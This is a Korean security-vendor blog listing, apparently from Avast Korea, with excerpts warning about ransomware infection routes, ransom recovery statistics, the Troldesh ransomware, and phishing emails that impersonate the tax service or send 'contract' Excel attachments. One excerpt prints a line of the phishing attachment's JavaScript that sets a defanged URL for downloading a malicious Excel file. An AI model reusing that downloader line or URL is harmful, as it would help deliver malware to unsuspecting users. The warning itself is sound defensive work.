본문 바로가기

새로운 소식/랜섬웨어 및 위협공지

랜섬웨어 공격 패턴 유형과 감염 경로에 대해 안녕하세요? Coveware사의 랜섬웨어 복호화 관련 대응을 통해 만들어진 보고서에 따르면 랜섬웨어로 암호화된 파일을 복구하는데 소요된 비용이 국가별로 엄청납니다. 해커에게 몸값을 주고 복호화한 복구율은 97%이고 99%가 비트코인으로 제공했습니다. 자세한 사항은 엠시소프트 블로그와 신뢰성있는 랜섬 복구 업체인 커브웨어의 보고서를 참조하여 주시기 바랍니다. 커브웨어 보고서에서는 여러가지 흥미로운 결과를 보여주고 있으니 꼭 참조하시기 바랍니다. 랜섬웨어 감염 경로를 보면 아시겠지만 주로 이메일을 통한 피싱메일을 클릭하여 감염되었다는 점과 기업의 서버나 PC에 설치되어 있는 RDP 서비스 (원격데스크탑) 오픈으로 감염된 것이라는 것입니다. 여기서 주의할 점은 기업에서는 피싱 메일 차단을 위한 스팸/바이러스 .. 더보기
랜섬웨어 공격받았다면 복구를 위해 신뢰성있는 사이트(coveware.com) 이용을 권장합니다. 랜섬웨어 감염시 기업의 업무 복구를 위해 많은 시간과 비용이 들기 때문에 빠른 복구를 위해 복구 업체를 찾는 분들이 많습니다. 대부분의 복구 업체들은 해커와 직접 연락을 통해 비용을 지불하여 복호화도구를 구매하여 복원을 시도하고 있는데, 복구율은 몸값을 지불하였을때에 93% 정도로 완전하게 복구가 불가능한 것으로 나타났습니다. 전체적으로 보았을 때 복구는 86%정도 되고 14%는 데이터 손실로 이어지고 있다고 Coveware.com 의 2018년 4/4분기 보고서에서는 말하고 있습니다. 암호화된 파일을 복구하기 위한 노력으로 백신회사들이 복구도구를 내놓고 있지만 실질적으로 복구할 수 없는 경우가 많고 희생자들은 해커와 직접 연락을 통해 몸값을 지불하거나 검색을 통해 복구 업체에 연락하는 것이 일반적입니다.. 더보기
변형 트롤데쉬 랜섬웨어 심각 - Avast 새로운 공격 추적 Avast는 올해 들어 10만 건이 넘는 랜섬웨어 공격을 차단하였습니다. 그리고 최근 1월 이후 가장 많이 배포되고 있는 것으로 보입니다. 이번 주, 올해 초 화제가 된 트롤데쉬라고 알려진 랜섬웨어가 러시아, 멕시코, 미국에서 다시 급상승했습니다. 아래 지도에서 볼 수 있듯이 한국에서도 랜섬웨어가 배포되고 있어 주의가 필요합니다. 올해 들어 10만 건이 넘는 랜섬웨어 공격을 차단한 데 이어 최근에는 1월 이후 가장 높은 보급률을 보이고 있습니다. 아래 그래프는 Avast에 의해 차단된 Troldesh 공격을 보여줍니다. 오른쪽 마지막 급상승은 6월 24일부터입니다. 어제 오늘 엄청난 트롤데쉬 랜섬웨어가 다시 증가하고 있습니다. 지난해 겨울 피싱 e메일로 퍼진 트롤데쉬(셰이드)는 현재 소셜네트워크와 악성 .. 더보기
국세청 송장사칭 이메일 2탄 국세청 송장 사칭 피싱메일 2탄이 또 나왔습니다. html 첨부하여 엑셀파일 내려받는 자바 스크립트 대신하여 첨부파일을 직접 xls 파일을 포함하여 발송하고 있습니다. 메일 제목은 "NTS eTaxInvoice 4683135"로 변경하였습니다. 메일 본문에 포함된 내용은 국세청 발송 양식을 모방하여 발송하고 있는 것으로 지난번과 동일합니다. 역시 주의가 필요합니다/ 확장자명은 NTS_eTaxInvoice_4683135.xls 형식으로 발송하고 있습니다. 작성 : 어베스트코리아 (주)소프트메일 더보기
엑셀파일을 이용한 집요한 피싱 메일 주의 - 이번에 "계약서입니다" 피싱 메일에 대한 공격이 이미 타겟화되고 맞춤형으로 발송되고 있어 많은 분들이 이메일애 대한 경각심이 높아진 것이 사실입니다. 하지만 랜섬웨어 유포하여 일반인을 대상으로한 금품 편위를 위한 해커들 역시 매우 집요합니다. 지난번 유사한 내용을 포스팅하였지만 이번에는 "계약서입니다"라는 제목으로 한국인 이름으로 발송된 (물론 메일주소는 듣보잡) 피싱 메일이 유포되고 있습니다. 피싱 기법은 매우 간단합니다. 엑셀파일을 자동으로 다운로드하도록 하는 html 파일을 첨부하여 사용자가 첨부파일을 열어보면 엑셀파일 실행하고 악성코드가 내려 받는 형식입니다. html 소스는 아래와 같습니다 var url= "***htt***p://goodfood.co.jp/C047743.엑셀"; 수상한 메일로 변경 -> 이후 말웨어로.. 더보기